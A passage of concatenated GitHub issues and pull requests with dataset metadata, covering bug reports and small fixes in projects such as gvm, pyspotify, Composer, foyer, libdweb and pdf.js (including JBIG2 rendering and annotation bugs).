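        # terms within `window` positions of the query term's position.
        if not query_terms:
            return 0.0
        total = 0.0
        for i, q in enumerate(query_terms):
            lo, hi = max(0, i - window), min(len(indexed_terms), i + window + 1)
            total += max((term_sim(q, t) for t in indexed_terms[lo:hi]), default=0.0)
        return total / len(query_terms)

    print(proximity_score(["john", "doe"], ["john", "q", "doe"]))  # 1.0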
2025-04-01T06:39:39.874027
2021-05-29T01:12:28
906272781
{ "authors": [ "jeremy-ebler-vineti" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8692", "repo": "moovweb/gvm", "url": "https://github.com/moovweb/gvm/pull/380" }
gharchive/pull-request
Support macOS 11 Big Sur Binary Downloads There was some compatibility code for Golang versions less than 1.4.3 that broke installs on Big Sur. Prior to 1.4.3, there were two versions for osx10.8 and osx10.6. 1.4.3 introduced a unified amd64 version. When macOS changed the major version from 10 to 11, that logic broke. This patch moves that compatibility logic into the "less than 1.4.3" check, and now checks both the major and minor version of macOS. I tried a different patch that would download go1.4.2.darwin-amd64-osx10.8.pkg on Big Sur, and it installed successfully, but go version printed a stack trace, so I adjusted the patch to print Binary Go unavailable for this platform. I tested go1.4.2, and it installs but also crashes. go1.5 installed and passed my go version test. We could write more code to protect Big Sur users from this, but I doubt many developers are still trying to use a Golang from 2015 on Big Sur, and I don't think my go version test is a comprehensive compatibility test anyway. PS: I included a whitespace-only commit, as a few lines used spaces for indentation while the overwhelming majority of the file used tabs. I just noticed that https://github.com/moovweb/gvm/pull/364 is largely the same patch. Moving the macOS-specific checks into the 1.4.x check is slightly better (since they only matter if that check passes), but it's a very minor optimization.
2025-04-01T06:39:39.886421
2016-01-26T14:17:59
128832238
{ "authors": [ "hoangphuongcs", "jodal" ], "license": "apache-2.0", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8693", "repo": "mopidy/pyspotify", "url": "https://github.com/mopidy/pyspotify/issues/181" }
gharchive/issue
get toplist not working, len of list is empty

    toplist = self.session.get_toplist(type=spotify.ToplistType.TRACKS, region='US')
    toplist.load()
    print len(toplist.tracks)   # -> 0
    print len(toplist.artists)  # -> 0

How do I fix this issue? Thanks! Toplists seem to work as expected:

    In [1]: import spotify
    In [2]: session = spotify.Session()
    In [3]: session.login('user', 'secret')
    In [4]: loop = spotify.EventLoop(session)
    In [5]: loop.start()
    In [6]: toplist = session.get_toplist(type=spotify.ToplistType.TRACKS, region='US')
    In [7]: toplist.load()
    Out[7]: Toplist(type=<ToplistType.TRACKS: 2>, region='US', canonical_username=None)
    In [8]: len(toplist.tracks)
    Out[8]: 100
    In [9]: len(toplist.artists)
    Out[9]: 0

Closing, as I assume you haven't been waiting for a solution for 3.5y.
2025-04-01T06:39:39.996527
2017-10-21T19:21:06
267406894
{ "authors": [ "courtox", "emmiep", "redhatjobin" ], "license": "apache-2.0", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8694", "repo": "mortenjust/androidtool-mac", "url": "https://github.com/mortenjust/androidtool-mac/issues/134" }
gharchive/issue
recording never starts but screenshot works Honor 6X - Android 7, macOS High Sierra, version 1.65. Just installed the latest version and recording never starts. It displays "recording finished" as soon as the video recording button is pressed. Same here: Nokia 3 - Android 7.1.1, macOS Sierra 10.12.6, AndroidTool 1.66 (1). However, sometimes clicking the video button seemingly does nothing (no indication that recording started), and sometimes it just says "recording finished" immediately, as for @redhatjobin. No video files are created in the screen recordings either (screenshots work though). Same for me: Samsung Galaxy Note 10.1 2010, Android 4.1, Mac OS X. Screenshot is working fine. Screencast just turns into a red square and then nothing happens. Below is what's visible when I start androidtool by hand from my terminal window:

    remote object '/sdcard/capture.mp4' does not exist
    mv: rename capture.mp4 to p4noteltexdJZO54Kcourtox03242018145957.mp4: No such file or directory
    ffmpeg version 2.6.1 Copyright (c) 2000-2015 the FFmpeg developers
    built with llvm-gcc 4.2.1 (LLVM build 2336.11.00)
    configuration: --prefix=/Volumes/Ramdisk/sw --enable-gpl --enable-pthreads --enable-version3 --enable-libspeex --enable-libvpx --disable-decoder=libvpx --enable-libmp3lame --enable-libtheora --enable-libvorbis --enable-libx264 --enable-avfilter --enable-libopencore_amrwb --enable-libopencore_amrnb --enable-filters --enable-libgsm --enable-libvidstab --enable-libx265 --disable-doc --arch=x86_64 --enable-runtime-cpudetect
    libavutil 54. 20.100 / 54. 20.100
    libavcodec 56. 26.100 / 56. 26.100
    libavformat 56. 25.101 / 56. 25.101
    libavdevice 56. 4.100 / 56. 4.100
    libavfilter 5. 11.102 / 5. 11.102
    libswscale 3. 1.101 / 3. 1.101
    libswresample 1. 1.100 / 1. 1.100
    libpostproc 53. 3.100 / 53. 3.100
2025-04-01T06:39:40.000096
2018-03-14T04:45:29
305021583
{ "authors": [ "mattsmith24", "mortie" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8695", "repo": "mortie/snow", "url": "https://github.com/mortie/snow/pull/10" }
gharchive/pull-request
Added --quiet option. Suppresses most messages. Test failures will still print and the 'Total: Passed X/Y tests' line will still print. This is a great idea. The only issue is that with test suites with only one describe, like the example project, the total isn't printed, because it would be wasteful to print both vector: Passed 6/7 tests and Total: Passed 6/7 tests. I'll merge this PR, and then fix that by making it always print the total when --quiet is provided. This is a great idea. The only issue is that when there's only one describe, which is the case in the example project, no total is printed, because it would look weird to print both vector: Passed 6/7 tests and Total: Passed 6/7 tests. I'll make it always print the total when the --quiet option is passed. https://github.com/mortie/snow/commit/13feeb0f129ad0754095af2403348a0392e47e8b Thanks!
2025-04-01T06:39:40.004104
2020-11-10T21:47:19
740266005
{ "authors": [ "imsnif", "qballer" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8696", "repo": "mosaic-org/mosaic", "url": "https://github.com/mosaic-org/mosaic/issues/38" }
gharchive/issue
Mosaic doesn't expand when resizing the terminal window and it panics OS: macOS. Terminal: Alacritty. When I run Mosaic inside Alacritty, I get into a situation where the Mosaic pane size is stuck (and sometimes it panics). To reproduce:

* Open Alacritty so it does not take the full screen area.
* Run mosaic.
* Resize Alacritty to full screen.
* Notice that Mosaic is still roughly its original size and doesn't reflow.
* Notice that vim didn't stretch after the resize.

I think this is: https://github.com/mosaic-org/mosaic/issues/34? I think you are correct.
2025-04-01T06:39:40.009070
2023-02-15T23:52:31
1586766955
{ "authors": [ "growlix" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8697", "repo": "mosaicml/composer", "url": "https://github.com/mosaicml/composer/pull/1973" }
gharchive/pull-request
Make wandb checkpoint logging compatible with wandb model registry What does this PR do? This PR modifies wandb_logger.py to instantiate model checkpoints as type "model" instead of ".pt", to allow compatibility with W&B's new model registry feature, which MosaicML and WandB are cross-promoting with a demo/webinar next week. Before submitting

[x] Have you read the contributor guidelines?
[ ] Is this change a documentation change or typo fix? If so, skip the rest of this checklist.
[ ] Was this change discussed/approved in a GitHub issue first? It is much more likely to be merged if so.
[x] Did you update any related docs and document your change?
[x] Did you update any related tests and add any new tests related to your change? (see testing)
[x] Did you run the tests locally to make sure they pass?
[x] Did you run pre-commit on your change? (see the pre-commit section of prerequisites)

@eracah LGTM. Just curious: do you have a link to a wandb run that used this? Why yes I do
2025-04-01T06:39:40.011083
2023-07-06T19:09:10
1792086163
{ "authors": [ "antoinebrl", "eracah" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8698", "repo": "mosaicml/composer", "url": "https://github.com/mosaicml/composer/pull/2353" }
gharchive/pull-request
Fix wandb error with autoresume issue What does this PR do? The new wandb release (0.15.5) changes its error messages for artifact downloading failures. Our WandBLogger is designed to be EAFP instead of LBYL, so it relies on catching an exact error to prevent autoresume from trying to download checkpoints from wandb that aren't actually there. This PR makes the check less specific (i.e. it catches all wandb CommErrors instead of just ones with specific messages). As a result, the EAFP code will work with the new wandb install. Unfortunately this didn't make it into v0.15.1. Will it be part of the next release?
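For illustration, a hedged Python sketch of the EAFP pattern described above (try_download_checkpoint is a hypothetical helper, not Composer's actual code; wandb.errors.CommError is the real exception class):

    from wandb.errors import CommError

    def try_download_checkpoint(api, artifact_name):
        # EAFP: attempt the download and treat any wandb communication error
        # as "no checkpoint available", instead of string-matching one message.
        try:
            return api.artifact(artifact_name).download()
        except CommError:
            # Previously the code matched a specific error message, which
            # silently broke when wandb reworded its errors in 0.15.5.
            return None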
2025-04-01T06:39:40.014088
2023-03-09T14:26:52
1617362728
{ "authors": [ "Landanjs", "samuelstevens" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8699", "repo": "mosaicml/examples", "url": "https://github.com/mosaicml/examples/issues/219" }
gharchive/issue
Error in ResNet ImageNet examples While training ResNet with the "mild" ImageNet recipe, I realized that the call to config.update(recipe_config) doesn't actually work. See these lines. recipe_config is an OmegaConf dictionary config with keys that include dots in the name:

    {
        'model.loss_name': 'binary_cross_entropy',
        'train_dataset.crop_size': 176,
        'eval_dataset.resize_size': 232,
        'max_duration': '36ep'
    }

When you call config.update(recipe_config), it adds these keys to the config object directly, instead of updating the config.train_dataset nested dictionary. This means the max_duration is actually 36ep because it's a top-level key, but the crop sizes will not be changed and the model loss is still cross entropy instead of the binary variant. You can fix it like this:

    for key, value in recipe_config.items():
        OmegaConf.update(config, key, value)

OmegaConf.update respects the dots in the key names. Thanks for identifying this and providing a fix! We will merge the fix in a PR soon. Apologies for the bug 😅
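To see the difference directly, here is a small OmegaConf snippet with toy values (not the actual recipe config; the "broken" behaviour is as described in this issue, with the dotted key stored literally):

    from omegaconf import OmegaConf

    base = {"train_dataset": {"crop_size": 224}, "max_duration": "90ep"}
    recipe = {"train_dataset.crop_size": 176, "max_duration": "36ep"}

    broken = OmegaConf.create(base)
    broken.update(recipe)  # stores a literal "train_dataset.crop_size" key
    print(broken.train_dataset.crop_size)  # still 224

    fixed = OmegaConf.create(base)
    for key, value in recipe.items():
        OmegaConf.update(fixed, key, value)  # dotted keys traverse the nesting
    print(fixed.train_dataset.crop_size)  # 176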
2025-04-01T06:39:40.034885
2019-10-30T21:24:04
514991518
{ "authors": [ "ahy3nz", "mattwthompson", "rsdefever", "uppittu11" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8700", "repo": "mosdef-hub/foyer", "url": "https://github.com/mosdef-hub/foyer/pull/288" }
gharchive/pull-request
Switch entrypoints to functions that load classes PR Summary: Small change post-#282 per suggestions of @uppittu11 and @ahy3nz https://github.com/mosdef-hub/foyer/pull/282#issuecomment-547144491 https://github.com/mosdef-hub/forcefield_perfluoroethers/pull/4/files#r339807274 Instead of the entrypoint being an instance of the force field, it's a function that grabs it. This cleans up the import such that the user more discretely instantiates the object. It also prevents the loading from happening upon import foyer and should save some time on imports. A quick local check saved ~0.3 seconds; no promises this is accurate. PR Checklist

[ ] Includes appropriate unit test(s)
[ ] Appropriate docstring(s) are added/updated
[ ] Code is (approximately) PEP8 compliant
[ ] Issue(s) raised/addressed?

Looks like the last test is being skipped now (it wasn't before). Should we drop it or fix it? foyer/tests/test_validator.py::test_forcefields[ff_file0] SKIPPED https://travis-ci.org/mosdef-hub/foyer/jobs/605218247?utm_medium=notification&utm_source=github_status We should remove this test because there are no forcefield xmls in foyer/forcefields/. I put them in foyer/forcefields/xml/ but didn't update the glob in that path. Maybe we could have a function that detects which plugins are installed when you import foyer (it could save/print the list of plugins too). And this can be used to iterate through all the plugins for this test. We can stick this in another PR if that's appropriate. In foyer/tests/test_plugin.py:

    @@ -6,9 +6,9 @@ def test_basic_import(): assert 'forcefields' in dir(foyer)
    -@pytest.mark.parametrize('ff_name', ['OPLSAA', 'TRAPPE_UA'])
    -def test_forcefields_exist(ff_name): ff_name in dir(foyer.forcefields)
    +@pytest.mark.parametrize('ff_loader', ['load_OPLSAA', 'load_TRAPPE_UA'])
    +def test_forcefields_exist(ff_loader): assert ff_loader in dir(foyer.forcefields)

What's the purpose of this test? It's just to make sure those loader functions are there, which ... I thought we are trying to move opls and trappe to their own repos, like PFE. assumes, for now, that we are shipping these force fields with the main repo. I like your idea for iterating through the loaders that are in the entry point group; it gets at what I was going for, but isn't this self-assuring? Since it only iterates through the loaders it finds, is there even a way for it to fail? I guess it could fail if the loader is bad, but the point was to check that the loaders we hope are there indeed exist.

    >>> funcs = [func for func in dir(foyer.forcefields) if 'load' in func and '__' not in func]
    >>> funcs
    ['load_OPLSAA', 'load_TRAPPE_UA']
    >>> [eval('foyer.forcefields.' + func)() for func in funcs]
    [<foyer.forcefield.Forcefield object at 0x11ab12470>, <foyer.forcefield.Forcefield object at 0x11a89aa58>]

I think this accomplishes what you suggested. I also noticed that even though we're checking these functions exist, we're not checking to see that they work. The above should fix that, I think. https://codecov.io/gh/mosdef-hub/foyer/src/update-entrypoints/foyer/forcefields/forcefields.py @rsdefever try to update gaff with these functions Check out this PR too for inspiration. https://github.com/mosdef-hub/forcefield_perfluoroethers/pull/7 @ahy3nz @uppittu11 take a look at my GAFF-foyer repo. I think it is now working with the latest entry points in foyer.
2025-04-01T06:39:40.037570
2021-10-19T20:14:41
1030703190
{ "authors": [ "justinGilmer", "umesh-timalsina" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8701", "repo": "mosdef-hub/foyer", "url": "https://github.com/mosdef-hub/foyer/pull/471" }
gharchive/pull-request
Return periodic torsion params, regardless of k value PR Summary: See #470 for further details. Previously, we didn't return any parameters if the value of k == 0. This PR attempts to fix that. Resolves #470.
2025-04-01T06:39:40.039855
2022-03-03T22:23:12
1158970750
{ "authors": [ "CalCraven" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8702", "repo": "mosdef-hub/reproducibility_study", "url": "https://github.com/mosdef-hub/reproducibility_study/pull/174" }
gharchive/pull-request
Modify pentaneUA statepoints for flexible and constrained In order to compare between MD and MC treatments of pentaneUA, we need to have both rigid and flexible models for pentaneUA.

* Lammps-VU and lammps-UD cannot do constrained bonds
* All MC engines and HOOMD + Gromacs can do constrained bonds
* All MC engines cannot do flexible bonds
* All MD engines can do flexible bonds

This PR updates the statepoints from init.py with two pentane "molecules": one that will be treated flexibly, and one that will be treated as constrained. I looked through the rest of the files, and I think we're good now. I added pentaneUA : Pentane() to the get_molecule function in system_builder, so it should work regardless of the name for the pentane molecule, such as the one used in the spe-subproject. Good catch @jennyfothergill
2025-04-01T06:39:40.078532
2022-12-01T15:13:25
1471491043
{ "authors": [ "Natejoestev", "moudey" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8703", "repo": "moudey/Shell", "url": "https://github.com/moudey/Shell/issues/68" }
gharchive/issue
vscode addon for formatting and highlighting It would be nice if you made a VS Code addon for Nilesoft Shell Script (.shl). It would add simple text highlighting and support for: collapsing {...} and multi-line items, and maybe IntelliSense. (Also, it would be nice if you had a Discord server 👍) I'm looking into it and I think I might be able to do it myself. This would be a really great contribution @moudey could you create a Discord server so we could chat about this on there?
2025-04-01T06:39:40.117154
2016-07-04T02:46:05
163594533
{ "authors": [ "d4ncer" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8704", "repo": "movio/apidoc-ui", "url": "https://github.com/movio/apidoc-ui/issues/32" }
gharchive/issue
Resource Content changes Remove Application name/description from all resource content pages. Replace with Resource Card for specific operation Implemented
2025-04-01T06:39:40.532001
2024-07-15T18:06:03
2409321071
{ "authors": [ "afranchuk", "mystor" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8706", "repo": "mozilla/cargo-vet", "url": "https://github.com/mozilla/cargo-vet/issues/626" }
gharchive/issue
Audit requirements may be overly strong when dealing with multiple root crates in a workspace This was noticed in https://bugzilla.mozilla.org/show_bug.cgi?id=1907810, specifically because of the changes in https://phabricator.services.mozilla.com/D212959#inline-1194604. If we have multiple crates in the local workspace which have different audit requirements, it is possible for an overly strong requirement to be placed on an indirect dependency. Specifically, suppose we have a dependency graph like the following, where W1 and W2 are toplevel workspace crates, D1 and D2 are third-party dependencies, and D1 optionally depends on D2. W1 does not enable this dependency but W2 does. If W1 has stronger audit requirements than W2 does, those stronger requirements can end up applying to D2, as the two D1 nodes are unified when running cargo metadata to have the combined feature set.

    W1[req:safe-to-deploy] -> D1[features:]
    W2[req:safe-to-run]    -> D1[features:D2] -> D2

    (D2 should require "safe-to-run", but will instead require "safe-to-deploy")

Unfortunately, I don't think that the output of cargo metadata really provides a way to resolve this ambiguity and get what the resolution would be for each workspace crate independently, such that we could treat the two D1 dependencies as separate "nodes" and not propagate the same audit requirements to their dependencies. It might be possible if we didn't trust the dependency resolution done by cargo and implemented feature resolution ourselves, but that seems like it'd be both a lot of work and likely to break as cargo updates and changes how feature resolution is handled. I've experimented a bit and it looks like using cargo tree --format "{p} {f}" --package CRATE will show the correct subset of features and thus dependent crates. Unfortunately, though, cargo tree doesn't support an output format more easily ingested by programs. Unfortunately it does look like if you run cargo tree without a specific --package flag it'll still unify features, as in the example from that bug: the neqo-udp crate still has a tokio dependency even under the gkrust crate unless you explicitly scope to only the gkrust package. Does seem like cargo metadata would need a --package flag, and we'd need a reliable way to enumerate all packages within the workspace so that we could do separate metadata runs for each one. On top of that we'd also need to tweak the graph building for the resolver and such so that dependency lists and inherited audit requirements could be dependent on which package the dependency graph is coming from.
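A toy Python model of the propagation problem may help (this is not cargo-vet's actual Rust resolver, just an illustration of why unification over-strengthens D2):

    STRENGTH = {"safe-to-run": 1, "safe-to-deploy": 2}

    def propagate(deps, reqs):
        # Push each crate's requirement down to its children, keeping the
        # strongest; naive fixed-point loop, fine for tiny acyclic graphs.
        reqs = dict(reqs)
        for _ in range(len(deps) + 1):
            for crate, children in deps.items():
                if crate not in reqs:
                    continue
                for child in children:
                    best = reqs.get(child)
                    if best is None or STRENGTH[reqs[crate]] > STRENGTH[best]:
                        reqs[child] = reqs[crate]
        return reqs

    # Unified graph (what cargo metadata reports): one D1 node with D2 enabled.
    unified = {"W1": ["D1"], "W2": ["D1"], "D1": ["D2"]}
    roots = {"W1": "safe-to-deploy", "W2": "safe-to-run"}
    print(propagate(unified, roots)["D2"])  # safe-to-deploy (too strong)

    # Per-root resolution: W1's D1 has no D2 edge, so D2 only inherits from W2.
    w1_only = propagate({"W1": ["D1"]}, {"W1": "safe-to-deploy"})
    w2_only = propagate({"W2": ["D1"], "D1": ["D2"]}, {"W2": "safe-to-run"})
    print(w1_only.get("D2"), w2_only.get("D2"))  # None safe-to-run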
2025-04-01T06:39:40.547823
2015-06-03T18:35:49
84709566
{ "authors": [ "rlr", "willkg" ], "license": "bsd-3-clause", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8707", "repo": "mozilla/fjord", "url": "https://github.com/mozilla/fjord/pull/593" }
gharchive/pull-request
[bug 1169261] Fix event tracking Event tracking needs the provider version number so we can distinguish between flows for successive algorithms. Further, the "suggest" event needs to be synchronous while the "view*" events can be asynchronous. Sorry--forgot to do this. :( r? lgtm r+! Thank you!
2025-04-01T06:39:40.642735
2018-07-23T22:34:10
343819816
{ "authors": [ "Gozala", "lidel" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8708", "repo": "mozilla/libdweb", "url": "https://github.com/mozilla/libdweb/issues/36" }
gharchive/issue
Request headers support for protocols This is a followup from #2 where you can find all the details. The quote below is a short summary: Request Headers - Things here are sadly far more complicated, but it is also clear that this is really important for proper support of Video / Audio tags that just assume an HTTP backend. It was suggested to me that we could do the following: Plain data from the request so that the protocol handler can parse HTTP headers or an alternative encoding of metadata. - Expose the existing HTTP parser so it could be used. There was quite a reluctance on this though, for reasons I did not understand (part of it was that it's written in C++ and could not be easily extracted for just parsing use). It was highly recommended to instead just support a more strictly encoded subset of the headers, as anything sent from video / audio tags would fit. Unfortunately it seems that supporting request headers would require C++ work and landing corresponding changes into Firefox, which is to say it's likely going to take a while and will likely come after we've shown that people are actually building on this work. Is an analog to HTTP's Range requests tracked under this, or should I create a separate issue for it? Let's track it here for now; depending on how it pans out I might need a separate one, but for now it's good. One thing that could help is an example that produces Range requests that are disregarded. @Gozala I believe seeking with <video> is the most popular use for range requests right now. I created a small sandbox illustrating current problems, more details in the README at: lidel/libdweb/tree/video-range-use-case-demo Migrated to https://bugzilla.mozilla.org/show_bug.cgi?id=1572215
2025-04-01T06:39:40.712934
2020-11-10T21:42:17
740263112
{ "authors": [ "siddjain", "timvandermeij" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8709", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/issues/12606" }
gharchive/issue
Question: Can this library not be used from Node.js? Hello, I just have a question. Can this library not be used from Node.js? I get this error when trying to open a PDF file:

    The browser/environment lacks native support for critical functionality used by the PDF.js library (e.g. ReadableStream and/or Promise.allSettled); please use an ES5-compatible build instead.

my code:

    const pdfjsLib = require('pdfjs-dist');
    const fs = require('fs');

    const pdfPath = 'test.pdf';
    const data = fs.readFileSync(pdfPath);

    var loadingTask = pdfjsLib.getDocument({data: data});
    loadingTask.promise

It's most definitely possible since we have examples of this in the examples folder. The key is that you use the ES5 build as indicated in the error; see https://github.com/mozilla/pdf.js/blob/master/examples/node/pdf2svg.js#L17
2025-04-01T06:39:40.717882
2021-08-03T13:01:02
959092718
{ "authors": [ "Snuffleupagus", "calixteman", "ypersion1956" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8710", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/issues/13851" }
gharchive/issue
Null pointer exception in optional_content_config.js when viewing PDF document The document in question: doc_image.pdf Configuration: Web browser - Chrome Operating system and its version: Windows 10 PDF.js version: 2.8.335, 2.10.377 Is a browser extension: no Expected document rendering: Actual rendering with an error I can reproduce with Firefox Nightly. @brendandahl, could you have a look? Thank you. When might the fix be available in a released version? Thank you. When might the fix be available in a released version? The patch has neither been reviewed nor landed yet, so you'll have to be patient :-) It will simply be included in the next release; however, no exact date for that can be provided (since we don't have a fixed release schedule), and note also that the last release was just nine days ago. Furthermore, this isn't a recent regression either, since it's been present ever since PR #12095, which landed a year ago.
2025-04-01T06:39:40.725820
2024-04-03T20:27:57
2223846727
{ "authors": [ "nico" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8711", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/issues/17883" }
gharchive/issue
transposed JBIG2 text segments with non-topleft reference corner don't render correctly Attach (recommended) or Link to PDF file here: symbol-texttranspose.pdf symbol-topright-transposed.pdf symbol-bottomleft-transposed.pdf symbol-bottomright-transposed.pdf Configuration: Web browser and its version: Chrome 123.0.6312.59 Operating system and its version: macOS 13.5.2 PDF.js version: today's trunk at https://mozilla.github.io/pdf.js/web/viewer.html (I verified it has the fix for #17871 already). Is a browser extension: No Steps to reproduce the problem: Open each of the four PDFs above What is the expected behavior? (add screenshot) They should all look like the first one: What went wrong? (add screenshot) The ones that have the reference corner not set to topleft are in various states of disarray: ITU-T_T_88__08_2018.pdf 6.4.5 "Decoding the text region" has two steps for updating CURS: once in "vi) Update CURS as follows:" before drawing the bitmap, and then again in "xi) Update CURS as follows:" after drawing the bitmap. It looks like 25f6a0c13965c5ad9cebe701e4752bde5e8fa811 mixes up these two steps with the "is transposed" check. Depending on the reference corner, this needs to happen before or after drawing for both transposed and untransposed images. Like in #17871: I made these files myself while writing a JBIG2 decoder. I'm reasonably confident that the files and Chrome and jbig2dec and my decoder are correct, but it's possible the files are wrong instead. Oh, and this isn't purely theoretical: this slightly-more-real-world PDF looks wonky because of this: transpose2.pdf It's not fully real-world since it's 042_19.jb2 from https://git.ghostscript.com/?p=tests.git;a=tree;f=jbig2;h=8a7abaf842435e204c1ff1dbeed10826bf24afe6;hb=HEAD wrapped in a PDF, so it's still a bit synthetic. But it's a file made by someone else at least, which maybe gives the bug report more credence.
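For reference, a Python-style pseudocode sketch of the CURS bookkeeping as I read T.88 6.4.5 steps vi) and xi) (hedged: the corner-to-ordering mapping here is my reading of the spec, not code taken from pdf.js, and draw() is a hypothetical helper):

    # Whether CURS advances before or after drawing depends only on the
    # reference corner: right corners pre-advance when untransposed,
    # bottom corners pre-advance when transposed.
    def place_symbol(cur_s, symbol, transposed, refcorner):
        w, h = symbol.width, symbol.height
        extent = (h - 1) if transposed else (w - 1)  # span along the S axis

        if transposed:
            pre = refcorner in ("BOTTOMLEFT", "BOTTOMRIGHT")
        else:
            pre = refcorner in ("TOPRIGHT", "BOTTOMRIGHT")

        if pre:
            cur_s += extent                  # step vi): advance before drawing
        draw(symbol, cur_s, refcorner, transposed)
        if not pre:
            cur_s += extent                  # step xi): advance after drawing
        return cur_s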
2025-04-01T06:39:40.732357
2024-10-17T14:11:46
2594871918
{ "authors": [ "atrinker", "calixteman", "zzadxz" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8712", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/issues/18915" }
gharchive/issue
[Bug]: Annotation artifacts remain visible in viewer after deleting all annotations. Attach (recommended) or Link to PDF file test.pdf Web browser and its version Mozilla Firefox Operating system and its version Windows 10 PDF.js version 4.7.76 Is the bug present in the latest PDF.js version? Yes Is a browser extension No Steps to reproduce the problem Open the attached PDF in the default viewer. Activate the annotation editor by clicking highlight on the toolbar. Scroll down to the following pages to load the annotations. Press Ctrl+A to select all annotations in the PDF. Press delete to remove all annotations at once. What is the expected behavior? All annotations should be removed from the PDF. What went wrong? Although the annotations are no longer selectable, some of them still appear visible in the viewer. They only disappear once the annotation editor is closed. Link to a viewer No response Additional context No response This is a tricky bug... When the pdf is rendered, we only render the first 2 pages (it depends on the zoom level), so we're only aware of the annotations we have on those pages. That means we don't have the ids, the properties, ... of the other annotations in the pdf. For example, we can ctrl+a and then change the color of one highlight; it should impact all the highlights of the document. So I think the only right way to fix this would be to get all the editable annotations when the user is selecting all, put them in the storage, and then apply the changes to the data we have in the storage. The problem is most likely OS related. I played around with it on macOS Firefox latest version (132.0.2 aarch64) and Chrome (131.0.6778.70). PDF.js correctly identified and rendered all highlighted text, regardless of the zoom level (even on "Page Fit", all highlights were selected and removed after backspacing or clicking on the delete button).
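A rough sketch of the proposed direction, pulling editable annotations from every page into the annotation storage on select-all, might look as follows; the isEditable flag and the storage shape are hypothetical placeholders rather than pdf.js's actual internals:

```js
// Hypothetical select-all handler: collect editable annotations from all
// pages (not only the rendered ones) so later edits apply document-wide.
async function collectAllEditableAnnotations(pdfDocument, storage) {
  for (let pageNum = 1; pageNum <= pdfDocument.numPages; pageNum++) {
    const page = await pdfDocument.getPage(pageNum);
    const annotations = await page.getAnnotations();
    for (const annotation of annotations) {
      if (annotation.isEditable) { // hypothetical flag
        storage.setValue(annotation.id, { ...annotation }); // hypothetical storage API
      }
    }
  }
}
```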
2025-04-01T06:39:40.735788
2022-10-18T12:00:34
1413094931
{ "authors": [ "Snuffleupagus" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8713", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/pull/15586" }
gharchive/pull-request
Remove the Glyph.matchesForCache method (PR 13494 follow-up) This method, and its class, was originally added in PR #4453 to reduce memory usage when parsing text. Then PR #13494 extended the Glyph-representation slightly to also include the charCode, which made the matchesForCache method effectively redundant, since most properties on a Glyph-instance indirectly depend on that one. The only exception is potentially isSpace in multi-byte strings. Also, something that I noticed when testing this code: the matchesForCache method never worked correctly for Glyphs containing accent-data, since objects are passed by reference in JavaScript. For affected fonts, of which there's only a handful of examples in our test-suite, we'd fail to find an already existing Glyph because of this. /botio test /botio test Note that being able to skip re-parsing this data over and over for every single rendered glyph is a small performance improvement. Some very quick console.time/timeEnd benchmarking, with the default tracemonkey.pdf file, suggests that it's on average 1-2 ms faster per page, which obviously isn't a lot but still doesn't seem worthless.
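The reference-comparison pitfall described above is easy to demonstrate in isolation (plain JavaScript, not pdf.js code):

```js
// Two structurally identical accent objects are still distinct references,
// so an identity check in a cache-match test never succeeds.
const accentA = { fontChar: '\u0301', offset: { x: 0.1, y: 0 } };
const accentB = { fontChar: '\u0301', offset: { x: 0.1, y: 0 } };

console.log(accentA === accentB); // false: different objects
console.log(accentA.fontChar === accentB.fontChar); // true: contents match
```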
2025-04-01T06:39:40.737093
2022-12-13T13:37:22
1494254734
{ "authors": [ "calixteman" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8714", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/pull/15820" }
gharchive/pull-request
The annotation layer dimensions must be set before adding some elements (follow-up of #15770) In order to move the annotations in the DOM so that their order corresponds to the visual order, we need their dimensions/positions, which means that the parent must have some dimensions first. /botio integrationtest /botio unittest
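As a generic illustration of the constraint (plain DOM code, not the pdf.js implementation), measuring a child only yields useful geometry once its parent layer has real dimensions:

```js
// A child of an unsized, detached parent measures as 0x0, so any
// visual-order sort based on positions must run after the layer is sized.
const layer = document.createElement('div');
const annotation = document.createElement('section');
layer.append(annotation);

console.log(annotation.getBoundingClientRect().width); // 0: layer not sized or attached

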